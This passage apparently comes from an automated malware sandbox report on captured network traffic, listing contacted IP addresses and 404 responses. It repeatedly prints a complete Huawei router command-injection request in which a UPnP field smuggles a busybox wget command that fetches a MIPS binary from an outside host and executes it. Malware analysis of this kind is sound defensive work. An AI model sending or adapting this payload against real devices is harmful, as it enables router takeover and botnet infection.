6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 31 37 32 2e 31 31 30 2e 32 34 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.172.110.241 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
      Source: unknownTCP traffic detected without corresponding DNS query: 61.76.22.146
      Source: unknownTCP traffic detected without corresponding DNS query: 23.228.252.146
      Source: unknownTCP traffic detected without corresponding DNS query: 167.61.225.82
      Source: unknownTCP traffic detected without corresponding DNS query: 196.7.75.56
      Source: unknownTCP traffic detected without corresponding DNS query: 154.241.51.147
      Source: unknownTCP traffic detected without corresponding DNS query: 23.29.188.234
      Source: unknownTCP traffic detected without corresponding DNS query: 111.158.5.202
      Source: unknownTCP traffic detected without corresponding DNS query: 141.229.33.152
      Source: unknownTCP traffic detected without corresponding DNS query: 104.167.221.9
      Source: unknownTCP traffic detected without corresponding DNS query: 74.62.72.251
      Source: unknownTCP traffic detected without corresponding DNS query: 179.71.83.72
      Source: unknownTCP traffic detected without corresponding DNS query: 128.117.4.49
      Source: unknownTCP traffic detected without corresponding DNS query: 32.222.200.14
      Source: unknownTCP traffic detected without corresponding DNS query: 5.153.241.51
      Source: unknownTCP traffic detected without corresponding DNS query: 81.25.222.140
      Source: unknownTCP traffic detected without corresponding DNS query: 180.213.193.141
      Source: unknownTCP traffic detected without corresponding DNS query: 131.138.30.253
      Source: unknownTCP traffic detected without corresponding DNS query: 170.217.232.94
      Source: unknownTCP traffic detected without corresponding DNS query: 89.65.31.75
      Source: unknownTCP traffic detected without corresponding DNS query: 32.82.143.80
      Source: unknownTCP traffic detected without corresponding DNS query: 12.199.160.105
      Source: unknownTCP traffic detected without corresponding DNS query: 1.30.206.40
      Source: unknownTCP traffic detected without corresponding DNS query: 13.55.109.90
      Source: unknownTCP traffic detected without corresponding DNS query: 41.229.254.231
      Source: unknownTCP traffic detected without corresponding DNS query: 84.183.153.128
      Source: unknownTCP traffic detected without corresponding DNS query: 113.183.96.66
      Source: unknownTCP traffic detected without corresponding DNS query: 139.67.227.25
      Source: unknownTCP traffic detected without corresponding DNS query: 66.68.24.116
      Source: unknownTCP traffic detected without corresponding DNS query: 25.234.111.0
      Source: unknownTCP traffic detected without corresponding DNS query: 208.217.82.85
      Source: unknownTCP traffic detected without corresponding DNS query: 195.96.81.94
      Source: unknownTCP traffic detected without corresponding DNS query: 81.254.39.16
      Source: unknownTCP traffic detected without corresponding DNS query: 203.214.61.184
      Source: unknownTCP traffic detected without corresponding DNS query: 97.97.170.115
      Source: unknownTCP traffic detected without corresponding DNS query: 41.175.187.12
      Source: unknownTCP traffic detected without corresponding DNS query: 148.123.144.137
      Source: unknownTCP traffic detected without corresponding DNS query: 75.201.151.117
      Source: unknownTCP traffic detected without corresponding DNS query: 153.163.26.129
      Source: unknownTCP traffic detected without corresponding DNS query: 34.100.244.30
      Source: unknownTCP traffic detected without corresponding DNS query: 153.118.148.66
      Source: unknownTCP traffic detected without corresponding DNS query: 149.234.204.59
      Source: unknownTCP traffic detected without corresponding DNS query: 204.8.69.100
      Source: unknownTCP traffic detected without corresponding DNS query: 161.243.172.243
      Source: unknownTCP traffic detected without corresponding DNS query: 154.95.1.133
      Source: unknownTCP traffic detected without corresponding DNS query: 133.45.63.154
      Source: unknownTCP traffic detected without corresponding DNS query: 132.217.68.209
      Source: unknownTCP traffic detected without corresponding DNS query: 109.124.239.109
      Source: unknownTCP traffic detected without corresponding DNS query: 170.26.252.76
      Source: unknownTCP traffic detected without corresponding DNS query: 14.60.20.140
      Source: unknownTCP traffic detected without corresponding DNS query: 98.196.19.248
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.17.1Date: Sat, 19 Feb 2022 15:05:21 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.17.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:05:32 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:05:33 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:05:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:05:51 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:05:54 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:05:54 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Sat, 19 Feb 2022 15:05:54 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveETag: "5f9e16e8-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 19 Feb 2022 15:05:57 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:05:57 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-rcDate: Sat, 19 Feb 2022 15:06:03 GMTContent-Type: text/htmlContent-Length: 1091Connection: keep-aliveVary: Accept-EncodingETag: "6118a5b0-443"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 3c 74 69 74 6c 65 3e 57 65 62 73 69 74 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 6f 42 61 63 6b 28 29 20 7b 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 20 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 2e 77 72 61 70 7b 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 7d 2e 6c 6f 67 6f 7b 20 77 69 64 74 68 3a 34 33 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 32 35 25 3b 20 6c 65 66 74 3a 33 35 25 3b 7d 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 70 78 3b 7d 70 20 61 7b 20 63 6f 6c 6f 72 3a 23 65 65 65 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 20 70 61 64 64 69 6e 67 3a 35 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 33 33 36 36 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 65 6d 3b 20 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 65 6d 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 65 6d 3b 7d 70 20 61 3a 68 6f 76 65 72 7b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 7d 2e 66 6f 6f 74 65 72 7b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 20 72 69 67 68 74 3a 31 30 70 78 